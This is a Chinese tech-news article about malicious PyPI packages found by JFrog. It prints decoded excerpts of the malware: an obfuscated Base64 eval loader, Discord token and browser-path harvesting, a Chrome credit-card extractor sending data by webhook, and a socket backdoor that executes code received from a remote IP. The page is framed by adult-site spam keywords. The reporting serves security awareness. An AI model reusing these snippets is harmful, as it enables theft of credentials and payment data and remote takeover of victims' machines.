成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

PyPI又雙叒叕發現惡意軟件,能盜取信用卡還有后門程序

新聞 應用安全
Python程序員真的要小心了,PyPI軟件庫問題真是越來越嚴重。繼今年6月出現挖礦病毒后,PyPI最近再次出現了一批惡意軟件。

[[415370]]

本文經AI新媒體量子位(公眾號ID:QbitAI)授權轉載,轉載請聯系出處。

Python程序員真的要小心了,PyPI軟件庫問題真是越來越嚴重。

繼今年6月出現挖礦病毒后,PyPI最近再次出現了一批惡意軟件,

JFrog安全團隊發現,PyPI庫中有多個軟件存在盜取信用卡信息遠程注入代碼的行為,而這些軟件總共被下載了3萬次。

這些被發現問題的惡意軟件分別是:

PyPI又雙叒叕發現惡意軟件,能盜取信用卡還有后門程序

當程序員安裝完這些軟件后,它們將在后臺不知不覺讀取瀏覽器文件夾,從而盜取信用卡信息和密碼。

它們是如何竊取信用卡信息的

安全研究人員發現,上述所有軟件包都使用Base64編碼進行偽裝。

比如上述的noblesse2:

  1. import base64, codecs 
  2. magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...' 
  3. love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...' 
  4. god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...' 
  5. destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...' 
  6. joy = '\x72\x6f\x74\x31\x33' 
  7. trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...'
  8. eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec')) 

這種方法可以欺騙一些簡單的分析工具,但是仔細研究可以發現其中的問題。

以上8個軟件包分別包含了以下不同種類的惡意行為:

1、竊取Discord帳戶身份驗證token

Discord身份驗證token讀取器的代碼非常簡單,它就是一組硬編碼的路徑:

  1. local = os.getenv('LOCALAPPDATA'
  2. roaming = os.getenv('APPDATA'
  3. paths = { 
  4.     'Discord': roaming + '\\Discord'
  5.     'Discord Canary': roaming + '\\discordcanary'
  6.     'Discord PTB': roaming + '\\discordptb'
  7.     'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default'
  8.     'Opera': roaming + '\\Opera Software\\Opera Stable'
  9.     'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
  10.     'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' 

然后代碼會讀取這幾種瀏覽器路徑下的所有.log和.ldb文件,并查找Discord身份驗證token,結果通過Webhook上傳到Discord。

2、竊取瀏覽器存儲的密碼或信用卡數據

當你在瀏覽器中輸入密碼或信用卡數據時,一般都會跳出如下窗口,提示用戶保存這些信息。

PyPI又雙叒叕發現惡意軟件,能盜取信用卡還有后門程序

雖然這給用戶帶來方便,今后不用一遍遍輸入密碼,但缺點是這些信息可能會惡意軟件獲取。

在這種情況下,惡意軟件會嘗試從Chrome竊取信用卡信息:

  1. def cs(): 
  2.     master_key = master() 
  3.     login_db = os.environ['USERPROFILE'] + os.sep + \ 
  4.         r'AppData\Local\Google\Chrome\User Data\default\Web Data' 
  5.     shutil.copy2(login_db, 
  6.                  "CCvault.db"
  7.     conn = sqlite3.connect("CCvault.db"
  8.     cursor = conn.cursor() 
  9.     try
  10.         cursor.execute("SELECT * FROM credit_cards"
  11.         for r in cursor.fetchall(): 
  12.             username = r[1
  13.             encrypted_password = r[4
  14.             decrypted_password = dpw( 
  15.                 encrypted_password, master_key) 
  16.             expire_mon = r[2
  17.             expire_year = r[3
  18.             hook.send(f"CARD-NAME: " + username + "\nNUMBER: " + decrypted_password + "\nEXPIRY M: " + str(expire_mon) + "\nEXPIRY Y: " + str(expire_year) + "\n" + "*" * 10 + "\n"

這些信息和前一種情況一樣會通過Webhook上傳。

3、收集有關受感染PC的信息:如IP地址、計算機名稱和用戶名

除此之外,這些軟件還會收集Windows許可證密鑰信息、Windows版本以及屏幕截圖。

4、遠程代碼注入

pytagora和pytagora2這兩個惡意軟件會嘗試連接到某個IP地址9009端口上,然后執行Socket中可用的任何Python代碼。

其中混淆的代碼被安全人員解碼成如下片段:

  1. import socket,struct,time 
  2. s=socket.socket(2,socket.socket.socket.SOCK_STREAM) 
  3. s.connect(('172.16.60.80',9009)) 
  4. l=struct.unpack('>I',s.recv(4))[0
  5. print (l) 
  6. d=s.recv(l) 
  7. print (d) 
  8. while len(d)>!1
  9. d+=s.recv(l-len(d)) 
  10. print (d) 
  11. exec(d,{'s':s}) 

但是安全人員現在不知道這個IP地址是什么,或者上面是否存在惡意軟件。

中毒后如何挽救

如果你發現自己的電腦已經安裝了諸如noblesse的惡意軟件,那么請檢查一下你的瀏覽器到底保存了哪些密碼,這些密碼可能已經泄露,請盡快修改。

對于Edge瀏覽器用戶,請在地址欄中輸入edge://settings/passwords,查看已保存的密碼。

對于Chrome瀏覽器用戶,請在地址欄中輸入chrome://settings/payments,在付款方式一欄下查看已保存的信用卡信息。

另外可以松口氣的是,PyPI維護人員已經刪除了這些惡意軟件包。

雖然PyPI軟件庫現在是安全了,但是鑒于這些開源軟件庫現在的維護狀態,未來很可能還會遇到更多攻擊。今年PyPI庫出現安全問題的狀況就不止一次出現。

[[415371]]

“攻擊者能夠使用簡單的混淆技術來引入惡意軟件,這意味著開發人員必須保持警惕。”

JFrog CTO說,“這是一個系統性威脅,需要由軟件存儲庫的維護者和開發人員在多個層面積極解決。”

 

 

責任編輯:張燕妮 來源: 量子位
相關推薦

2021-08-05 06:22:02

惡意軟件Python軟件信用卡

2017-03-13 16:58:05

戴爾

2025-02-20 12:00:13

React前端React 19

2018-11-08 17:57:22

華為

2021-10-30 19:01:17

磁盤字節文件

2021-08-04 09:24:58

PyPI惡意軟件漏洞

2024-12-06 14:58:22

2024-04-03 15:41:53

服務器

2025-04-08 09:29:55

2020-05-18 13:23:59

寧暢

2018-01-17 16:36:40

Windows 10Windows免費升級

2023-01-10 11:37:22

Python 庫PySnooper項目

2017-11-21 10:13:11

微軟打印機補丁

2018-04-13 11:14:42

2022-08-10 18:20:25

信用卡竊取新加坡網絡釣魚

2021-02-22 10:04:10

黑客Google AppsCSP

2023-12-15 09:19:44

百度飛槳文心大模型大模型

2020-09-01 11:00:14

UltraRank惡意代碼網絡攻擊

2022-08-10 18:23:39

Python軟件包索引惡意軟件

2020-03-27 22:29:16

信息安全網絡攻擊東京奧運會
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 爱爱免费视频 | 日韩福利在线 | av大片在线观看 | 久久国产精99精产国高潮 | 中文字幕av一区二区三区 | 亚洲一区 | 影音先锋中文字幕在线观看 | 秋霞在线一区二区 | 欧美日韩一区二区三区在线观看 | 国产成人99久久亚洲综合精品 | 国产在线播放一区二区三区 | 午夜av电影 | 日韩一区二区三区在线播放 | 国产精品久久久久久久免费大片 | 中文字幕国产视频 | 一区二区三区四区在线免费观看 | 亚洲 中文 欧美 日韩 在线观看 | 免费日韩av网站 | 欧美一级片黄色 | 国产一区二区三区在线 | 成人在线视频一区 | 99爱免费| 国产高清精品一区二区三区 | 亚洲狠狠 | 夜夜草| 久久久久91 | 欧美一区二区免费在线 | 一级片av | 亚洲视频在线免费观看 | 天天爽天天操 | 国产精品成人久久久久a级 久久蜜桃av一区二区天堂 | 国产成人免费视频网站高清观看视频 | 精品久久国产 | 日韩福利在线 | 午夜性色a√在线视频观看9 | 91久久看片 | 美女黄网 | 中文在线a在线 | 色综合久| 操操日 | 亚洲一页 |